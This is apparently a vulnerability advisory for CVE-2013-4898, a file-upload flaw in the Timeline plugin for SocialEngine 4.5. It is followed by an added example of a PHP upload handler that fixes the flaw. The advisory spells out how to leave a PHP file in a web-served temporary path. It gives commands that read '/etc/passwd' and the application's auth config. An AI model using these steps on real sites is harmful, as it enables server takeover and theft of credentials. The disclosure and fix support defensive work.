Vendor: SocialEngine 4.5
By: Wesley Henrique Leite aka 'spyk2r'
CVSS: 4.3 MEDIUM
Remote Code Execution
CWE: 78
Product Name: SocialEngine 4.5
Affected Version From: plugin Timeline 4.2.5p9 for SocialEngine 4.5
Affected Version To: plugin Timeline 4.2.5p9 for SocialEngine 4.5
Patch Exists: YES
Related CWE: CVE-2013-4898
CPE: a:webhive:socialengine:4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2013
Sending a PHP file as the Timeline plugin cover image in SocialEngine 4.5
While logged into the system, open your user's profile page. Click 'Change Cover' and then 'Upload Cover' and select the '*.php' file you want to send. The selected file is uploaded to a temporary area. The system detects that the format is not valid and displays an error message, but it does not remove the file, so the file remains accessible afterwards. Access can be gained by going to '/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php' and exploiting the vulnerability with a command such as 'cat /etc/passwd' or 'cat ../../../install/config/auth.php'.
Mitigation:
Ensure that the plugin is up to date and that the server is properly configured to prevent malicious file uploads.
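
The failure described above is a rejected upload that stays in a web-served directory under its original '.php' name. The following added example (not SocialEngine or Timeline plugin code) shows an upload handler that closes that gap. The function name `store_cover_image`, the two directory parameters and the allowed-type list are assumptions, and the staging directory is assumed to sit outside the web root.

```php
<?php
// Added example: hypothetical cover-upload handler, not SocialEngine or Timeline plugin code.
// Function name, directory parameters and the allowed-type list are assumptions.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate an uploaded cover image and store it.
 * $upload is one entry of $_FILES; $stagingDir must be outside the web root.
 * Returns the stored path, or throws after removing the rejected file.
 */
function store_cover_image(array $upload, string $stagingDir, string $publicDir): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }

    // Stage under a server-chosen name with no extension, outside the web root,
    // so the client-supplied name ("x.php") never reaches a servable path.
    $staged = $stagingDir . '/' . bin2hex(random_bytes(16));
    if (!move_uploaded_file($upload['tmp_name'], $staged)) {
        throw new RuntimeException('Could not stage upload');
    }

    try {
        // Decide the type from the file content, not from the file name or
        // the client-sent Content-Type.
        $mime = (new finfo(FILEINFO_MIME_TYPE))->file($staged);
        if (!isset(ALLOWED_IMAGE_TYPES[$mime]) || getimagesize($staged) === false) {
            throw new RuntimeException('Not a valid image');
        }
        // The extension comes from the allowlist, never from the upload.
        $final = $publicDir . '/cover_' . bin2hex(random_bytes(8)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
        if (!rename($staged, $final)) {
            throw new RuntimeException('Could not publish image');
        }
        return $final;
    } finally {
        // The step the advisory describes as missing: a rejected file is removed.
        if (is_file($staged)) {
            unlink($staged);
        }
    }
}
```

Because the stored extension is always one of the allowlisted image extensions, a file that passes the content check is still never saved under a name the server would hand to the PHP interpreter.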